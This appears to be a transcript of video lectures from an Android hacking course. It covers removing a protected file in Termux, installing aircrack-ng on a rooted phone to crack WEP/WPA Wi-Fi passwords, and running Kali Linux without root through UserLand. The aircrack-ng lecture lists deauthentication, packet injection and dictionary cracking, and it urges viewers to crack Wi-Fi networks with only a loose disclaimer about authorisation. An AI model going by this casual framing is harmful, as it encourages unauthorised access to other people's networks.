you are inside the Sechis. Now if you cd space dot dot, then if you try rm minus r say cheese, once again we'll try, if you try rm minus r say cheese, it will say there is no regular permission available for this, write protected regular file. So what we're gonna do, we're gonna move this say cheese to our SD card. All right, now if we move this SD to its to our SD card, once we ls, we cannot see, I mean, there is no file like uh, say cheese in our home directory, right? Next we'll do ls, and once we do ls, we can see say cheese in our internal, that is SD card, that is internal storage. Now from here we can remove this. Simply type rm minus r say cheese, and this will be removed. This was a short video for you guys how you can just remove this say cheese from termux, because at times there are some protected files so you cannot remove. So simply move that folder to home directory, and from home directory you can simply move it to SD card. Once it is there in the SD card, you can simply delete it. So thank you so much, and hope you are safe and aware, totally aware what's going on around us. So make sure you do not, once again I'm saying, I'm making you aware, do not click any link, do not download any app other than Play Store. Stay safe, stay aware.
Hello everyone, and welcome to this video. So this is a very optional kind of a video which I'm creating. This is only for those who are having a rooted Android device. So in this video, I'll guide you how to install AirCrackNG, and how we can get, or how we can hack the Wi-Fi with the help of a rooted Android device. And here we'll use AirCrackNG. So what is AirCrackNG? AirCrackNG is a complete suite of tools to access Wi-Fi network security. It focuses on different areas of Wi-Fi security. We have monitoring mode,
In monitoring mode, packet capture and export of data to text files for further processing by third party tools. Attacking, that is, relay attacks, deauthentication, fake access points, and other via packet injection. We can also do testing, that is, checking Wi Fi cards and driver capabilities, that is, capture and injection. Also, we can crack WEP, WPA, PSK, WPA 1 and 2. All tools are common line all tools are command line, which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily in Linux, but also Windows and OS X free BSD, as well as Solaris and even eCom Station 2 can also work there. So simply, I'll quickly show you how you can download this, and till the end I'll show you why this is not working in my Android device, because it is not rooted. So if you have a rooted device, you can easily try this aircrack ng and get the Wi-Fi. I mean, you can get Wi-Fi passwords as well. We can get password for WEP, WPA. Yes, I have done this. I mean, for checking whether our Wi-Fi is encrypted or not. I have done this with the help of Linux in my system. So yeah, in if you have a system, that is, if you have a PC or anything, I mean, if you have a PC, laptop, computer, whatever, and inside that if you have a Linux or Kali Linux installed, then you can with the help of a network adapter, you can easily use this aircrack ng there. But to use it in Termux, it is very important to you important for us to have a admin rights. I mean, the device should be rooted. So if your device is rooted, you can follow the steps till the end, and you will be able to get the Wi-Fi, able to crack the Wi-Fi. So let's begin. So here we'll type airmon ng and start WLAN 0, that is wireless LAN. So it will say that airmon ng is not installed. So for that, we'll simply type if config. Let's see, WLAN 0. Yes, WLAN 0 is there. Since my device is not rooted, there will be many problem. You can see how many packages I need to install. That is aircrack ng I need to first install. So for that, acha before that, acha after that, that is pkg in root hyphen repo. Yes, first of all we need to install this package. Thereafter we'll try to install pkg install airmon, that is aircrack ng. It will take some time depending on your internet speed, but yes, once this first pkg, that is repo, which we are installing is done, then we'll try to install aircrack ng. Yes, it is downloaded now. Next, let's scroll up. uh, yeah, pkg install aircrack ng. We'll just simply copy this command. Okay, so before that, just update and upgrade your termux. It will take some time depending on the internet speed. So today my internet speed is pretty low, so it will take near about some, it's showing 20 minutes, but I don't think so. Yeah, I'll just
fasten up my installation process. So once this update and upgrade is done, we'll install this pkg aircrack ng. So yeah, as I was telling you about the aircrack ng, it is a network software suite that is consisting of a detector, packet sniffer, WEP, WPA, WPA2 PSK cracker, and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b, and 802.11g traffic. The program runs under Linux, macOS, FreeBSD, OpenBSD, and Windows. So, once this is done, and if your Android device is rooted, after that you will be needing, you will be requiring a network adapter as well. So, since this my device is not rooted, I won't be able to show you. But yeah, after this installation and Aircrack NG is successfully installed, I'll just give you. Acha, in the okay, in the next reading material, you will find how to start this, how to get this Wi-Fi password, and how you can crack WPA, PA2, WEP Wi-Fi passwords. So I'll just after this installation process is done, you can go through the reading material. So if your device is rooted, you can follow the procedure. Also, keep in mind you need network adapter. So this video is optional only for those who are having a rooted device. Okay, it's not, this video is that's why in the beginning only I told you this is just an optional video, so this is not for everybody. Will definitely come, I'll definitely come up with a non-rooted device like mine which is not rooted, so how we can get and crack the Wi-Fi passwords. Okay, but this is only for those who are having a rooted device. So what are the features we have? So in the Aircrack NG software suite includes Aircrack NG, which cracks WEP keys. We have PW attacks, WPA, WPA2 PSK using dictionary attacks. We have Airmon NG, which places different cards in monitor mode. We have Airplay NG, which is a packet injection for Linux, Windows, and we have Aerodom ng, which is packet sniffer, which places air traffic into pcap or files and shows information about network. We have packet forge ng, that creates encrypted packets for injection. So we have various features inside this Aircrack ng. So once we'll try this Airmon ng after this installation is done. Then also we have buddy ng, buddy hyphen ng. It is the helper server for is side ng run on a remote computer. Okay, we have airbase ng that incorporates techniques for attacking client as opposed to access points. So there are various what we can features we can say. So yeah, the this all the features will be listed in the reading material. Once this installation is done, you can easily go through these features. So yeah, make sure your device is rooted, otherwise this thing won't work in your non-rooted Android device. This is a very powerful tool which many of the ethical hackers, pen testers, and also those who are trying to check how much Wi-Fi encryption is. how much strong is the encryption. So they use this tool, that is aircrackng software. uh, in Linux, I have used in Kali Linux. So yeah, I have tried with the help of network adapter. So most of the time I was able to crack it. It also depends upon your computer hardware. So yeah, very important, you should have a network adapter which will help your Kali and this software to get all the passwords. So yeah, it has been downloaded and the installation process has started. Oh, just a second. The update and upgrade has been done. Sorry. So yeah, pkg install aircrack ng. Let's see. Installation done. We'll try airmon ng. Let's see. Clear the screen. Type airmon ng. This is one of the feature of aircrack ng. Airmon ng start. WLAN 0. As you can see, it is showing run it as root. So since my device is not rooted, so it won't be working in my device. So if your device is rooted, you can try this, and rest of the procedure is there in the reading material. You can go through it. And this is also a very optional video, so this is not for everybody. Okay, so yeah, you can try if you have a laptop, you can, or a computer system, you can try using Kali Linux inside your system. Or also you need a Wi-Fi adapter, and you can easily crack most of the Wi-Fi passwords, because aircrack ng is very much powerful tool and software. So this will be a very useful thing for you to learn, and also to help how to help, I mean, to guide the encryption. Like if you feel, or if you find any kind of a loophole in the encryption, you can directly report, or directly talk to the encryption department, like whosoever has made the encryption. If it is AES, any encryption it is there, if you find any loophole, you can directly contact to the respective person or the company, whosoever is responsible for that encryption, and you can report them. So this is very useful tool for you and for everybody who is learning this, because with the help of this we can crack various passwords. Also we can help everybody to just do not misuse this tool, and help everybody to understand how encryption is working, help them like what are the loopholes, and just uh, help the society, because this is a very powerful tool and we should not misuse it. So yeah, if you find any kind of loophole, directly report to the respective person or the company, and it would be very useful for you as well as the authority. So thank you so much. Once again, do not misuse anything which has been shown in this course, because this is purely for learning purpose. And this is, first of all, it's a learning purpose, and more importantly, it is for the awareness. Like nobody can make, whosoever is taking this course, after the completion of this course, nobody, he or she, can ever be fooled by anybody. If your friend is giving you a app or a link, anything, just make sure you are not clicking any random links or downloading anything other than Play Store, because Play Store, you can trust Play Store, because 90% to 98% you can trust in Play Store, because most of the apps are scanned, and uh, Play Store goes, Google goes through it thoroughly. So yeah, you can trust Play Store. So this entire course is for learning purpose. Do not misuse any tool software, because I am not responsible for any wrong or unethical thing you are doing. This is only for learning purpose. So thank you so much.
Hello everyone and welcome to the class. Now in this video lecture, we'll learn how we can use Kali Linux in our Android device without root. So with just few steps, an Android phone can be weaponized into a covert hacking device capable of running tools such as Nmap, Nikto, Netcat, all without rooting the device. So, what is Userland? Userland, created by Userland Technologies, is a completely free Android app that makes installing Linux distributions quick and effortless without any rooting. With this, it's possible to run an ARM64 Debian operating system alongside the current Android OS. Sometimes referred to as Arch64, this ARM architecture is the same used by the Kali Linux Raspberry Pi PI-ARM images, which makes it easy to import Kali's tool repository. And best of all, the userland team recently added a dedicated Kali file system, so importing repositories won't be necessary for all users. All of the created file systems are easily disposable. While many Kali tools work without issues, userland is still a new project and may cause some tools to break or fail. For example, like Nmap. So when executing certain commands, few tools may fail or break as we can say userland is still new in a project. Okay, it's worth mentioning these issues will likely be resolved in the near future. So we'll start by installing an SSH client, which will be the primary app for interacting with the Debian OS. Then we'll walk through some OS setup tips and importing the Kali Linux repository to really turn Android into a hacking device. First, step 1. We need to first install the Connect Bot app. So this is a optional kind of a thing, but it's better to use this Connect Bot app. So Userland recently added a built-in SSH functionality, so this step is no longer required. However, third-party SSH clients can still be used if preferred. So we'll use ConnectBot. So what is a ConnectBot? ConnectBot is an open source SSH client designed for Android smartphones, which allows you to securely connect with SSH servers. This will be the primary way of interacting with the new Userland Debian operating system. If you don't use or have access to Google Play, ConnectBot is also available via AppDroid repository. So first of all, we'll go to Play Store and install ConnectBot along with Userland. So let's first install ConnectBot from Play Store. Step 2 will be installation of Userland app. I've already covered what Userland is and does, so I won't go over anything else in details here. The important thing is that if you don't want to, if you don't have Google Play, you can also download this Userland from F-Droid as well. So once ConnectBot is done, we'll install Userland. So yeah, a few important tips. Userland does have limitations. Without root access, Android Wi-Fi interface can't be switched into monitor mode. So traditional Wi-Fi hacking tools like AirCrack NG won't work. However, there's still a lot that can be done with Userland. As you will see in future guides, and Kali Linux, running Kali without rooting or wiping the Android OS is no easy achievement. So, be sure to give the Userland app a good rating on Google Play. The developers totally deserve some positive feedback, yeah? So, yeah, let's try. Hit Kali. It will ask for permissions. Allow. So, once you have allowed it, next you need to give username and password and VNC password. So VNC is optional. So just give a name and a password. Just say, for example, 123456. So this is how we have created a new file system. Then after giving the VNC, if you want, it's an optional, then hit continue. Thereafter it will prompt, please select a connection. So select the SSH connection and then continue. So as you can see, the downloading required assets 1 out of 2 complete. So it will take near about uh, 10 to 15 minutes depending on your internet speed to download all the required assets. So you can just wait for 10 to 15 minutes, and once it's done, you'll start the Kali. By mistakenly, I have turned on the Termux, so that's why you have seen airmon ng command. So yeah, I am once again back in New Zealand. So yeah, welcome to Kali in New Zealand. Once all the setup has been successfully installed and repositories has been done, so next we need to go to SU, that is super user, and thereafter we'll update and upgrade Kali. So for that, we have a command apt get update, and we can use apt get upgrade. Or you can use dist, that is dist hyphen upgrade. So yeah, it will take again few minutes depending on your internet speed to update and upgrade your Kali. Since my internet connection is pretty slow today again, so it may take more than 10 to 15 minutes for me. So once it's done, your Kali Linux is up and running in your non-rooted Android device. So congratulations. You can use all the various commands. So yeah, you need to download few things. This is all we have been doing this from quite a few time now. So yeah, you know how to install everything. Press yes and then hit enter. Then it will automatically download few files and then install. So yeah, once all the installation is done, so your Kali is up and running with the help of userland. So you don't require what we say, yeah, rooted device for to to run Kali Linux in your device. So you can easily run Kali Linux with the help of userland. So yeah, as you can see, the files are getting extracted, all the packages are getting installed. So this is one of the best tool you can use. So this is not easily available anywhere, uh, whether you find it in YouTube or anywhere. So yeah, if you like this course, then please do review us, and and also give a comment. I mean, how you'd like the course, like is it a good, bad, what are the improvements we can bring in our coming courses as well. So thank you so much.